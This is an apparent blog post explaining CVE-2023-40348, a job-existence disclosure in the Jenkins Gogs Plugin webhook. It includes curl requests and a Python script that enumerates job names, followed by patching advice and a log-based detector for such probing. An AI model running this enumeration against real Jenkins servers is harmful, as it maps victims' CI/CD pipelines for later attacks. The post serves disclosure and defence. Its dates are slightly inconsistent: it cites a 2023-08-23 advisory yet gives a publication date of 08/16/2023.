CVE-2023-40348 - Inside Jenkins Gogs Plugin Info Disclosure Flaw (With Exploit Example)

CVE-2023-40348 is an information disclosure vulnerability in the Jenkins Gogs Plugin, affecting versions 1.0.15 and earlier. It lets unauthenticated attackers determine whether a given job exists simply by interacting with the plugin's webhook endpoint. In this post, I'll break down what the vulnerability is, show a code example, and explain step by step how it can be exploited.

What Is The Jenkins Gogs Plugin?

The Jenkins Gogs Plugin helps Jenkins users connect to Gogs, a self-hosted Git service. It allows Jenkins to listen for events from Gogs, such as code pushes, through a webhook endpoint.

About The Vulnerability

- The webhook endpoint in the Jenkins Gogs Plugin (up to 1.0.15) does not properly enforce authentication on certain requests.
- When an unauthenticated user sends a POST (or GET) request to the webhook endpoint, the plugin's response reveals whether a specific job exists in Jenkins.
- This allows attackers to enumerate job names, which is useful information for planning further attacks (targeted exploits, social engineering, or identifying sensitive jobs).

Official Advisory

- Jenkins Security Advisory 2023-08-23
- NVD Entry for CVE-2023-40348

How Does The Exploit Work?

Suppose you’re running a vulnerable Jenkins with the Gogs Plugin enabled.

The vulnerable endpoint is usually found at

http://<jenkins-server>/gogs-webhook/post

The attacker can send a POST request with a crafted payload that references a job name, and Jenkins will respond differently depending on whether that job exists.

Example with curl

curl -X POST "http://jenkins.company.local/gogs-webhook/post?job=my-secret-job"

Or, if the server expects JSON

curl -X POST "http://jenkins.company.local/gogs-webhook/post" \
  -H "Content-Type: application/json" \
  -d '{"job":"my-secret-job"}'


The difference in responses tells the attacker whether or not a Jenkins job with that name exists, all without authentication.

2. Enumerating Jobs

An attacker can script requests with lists of probable job names (like backup, deploy-prod, test, secret-project, etc.) and automate the discovery of jobs.

Python Example: Job Enumerator

import requests

# Webhook endpoint with the job name substituted into the query string
base_url = "http://jenkins.company.local/gogs-webhook/post?job={}"

# Candidate job names to probe
job_list = ["backup", "deploy-prod", "build", "test", "secret-project"]

for job in job_list:
    # The endpoint answers unauthenticated requests; the response text differs
    # depending on whether the named job exists
    resp = requests.post(base_url.format(job), timeout=10)
    if "does not exist" not in resp.text:
        print(f"Job exists: {job}")
    else:
        print(f"Job not found: {job}")

Why Is This A Problem?

- Information Disclosure: Attackers can map out your Jenkins jobs, indirectly learning about your CI/CD workflow, environment, and even sensitive responsibilities assigned to specific jobs (like “database-backup” or “prod-deploy”).
- Precursor To Other Attacks: Knowing job names can make further attacks easier, especially if those jobs have weak security on build parameters, credential usage, or scripts.

How To Fix Or Defend

- Update Immediately: If you use Jenkins Gogs Plugin 1.0.15 or earlier, update to the latest version as soon as possible.
- Restrict Network Access: Do not expose Jenkins webhooks or the Jenkins UI to the public internet.
- API Gateway or Web Application Firewall: Use additional authentication and monitoring for endpoints like /gogs-webhook/post.
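The monitoring half of that advice is easy to put in place even before a patch lands: an enumeration run against the webhook looks like one client asking about many different job names in a short time. The detector below is an added example, not code from the post or from the Gogs Plugin; it parses constructed reverse-proxy access-log lines (Common Log Format, with the query string kept in the request target) and flags any client that queried the /gogs-webhook/ endpoint with five or more distinct job names inside a 60-second window. The log lines, client addresses and thresholds are all assumptions for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# Constructed reverse-proxy access log (not real traffic): 10.0.0.5 probes several job
# names within seconds; 10.0.0.9 is one normal push trigger and a UI login.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Aug/2023:15:20:01 +0000] "POST /gogs-webhook/post?job=backup HTTP/1.1" 200 47
10.0.0.5 - - [16/Aug/2023:15:20:01 +0000] "POST /gogs-webhook/post?job=deploy-prod HTTP/1.1" 200 47
10.0.0.5 - - [16/Aug/2023:15:20:02 +0000] "POST /gogs-webhook/post?job=build HTTP/1.1" 200 47
10.0.0.5 - - [16/Aug/2023:15:20:02 +0000] "GET /gogs-webhook/post?job=test HTTP/1.1" 200 47
10.0.0.5 - - [16/Aug/2023:15:20:03 +0000] "POST /gogs-webhook/post?job=secret-project HTTP/1.1" 200 47
10.0.0.9 - - [16/Aug/2023:15:21:10 +0000] "POST /gogs-webhook/post?job=build HTTP/1.1" 200 47
10.0.0.9 - - [16/Aug/2023:15:25:42 +0000] "GET /login HTTP/1.1" 200 2311
"""

# Common Log Format; the request target keeps its query string so we can read ?job=
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
WEBHOOK_PREFIX = "/gogs-webhook/"  # the plugin endpoint discussed on the page


def parse_webhook_hit(line):
    """Return (client_ip, timestamp, job_name) for a webhook request naming a job, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    job = parse_qs(url.query).get("job", [None])[0]
    if not url.path.startswith(WEBHOOK_PREFIX) or job is None:
        return None
    return m["ip"], datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"), job


def find_job_enumeration(log_text, window=timedelta(seconds=60), threshold=5):
    """Flag clients that asked about `threshold`+ distinct job names inside any `window`."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_webhook_hit(line)
        if rec:
            hits[rec[0]].append((rec[1], rec[2]))
    flagged = {}
    for ip, events in hits.items():
        events.sort()
        start = 0
        for end in range(len(events)):  # sliding time window over this client's hits
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {job for _, job in events[start:end + 1]}
            if len(distinct) >= threshold:
                flagged[ip] = sorted(distinct)  # {client_ip: job names it probed}
                break
    return flagged
```

Run against SAMPLE_LOG this returns only 10.0.0.5 with the five names it probed; tune the window and threshold to the normal webhook rate of your Gogs instance so that a burst of pushes to a handful of real jobs does not trip it.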

References

- Jenkins Security Advisory 2023-08-23 (SECURITY-3202)
- NVD Entry for CVE-2023-40348
- Gogs Plugin Page on Jenkins
- GitHub - Gogs Plugin Source Code

Final Thoughts

CVE-2023-40348 is a good reminder that “small” information leaks can add up to serious security risks. Even just learning the names of jobs in Jenkins could help attackers break into bigger parts of your software delivery chain.

Patch as soon as you can. Encourage your team to treat CI/CD services as production infrastructure, with strict access control and monitoring.

If you have more questions on Jenkins security, let me know in the comments!

Timeline

Published on: 08/16/2023 15:15:00 UTC
Last modified on: 08/18/2023 19:59:00 UTC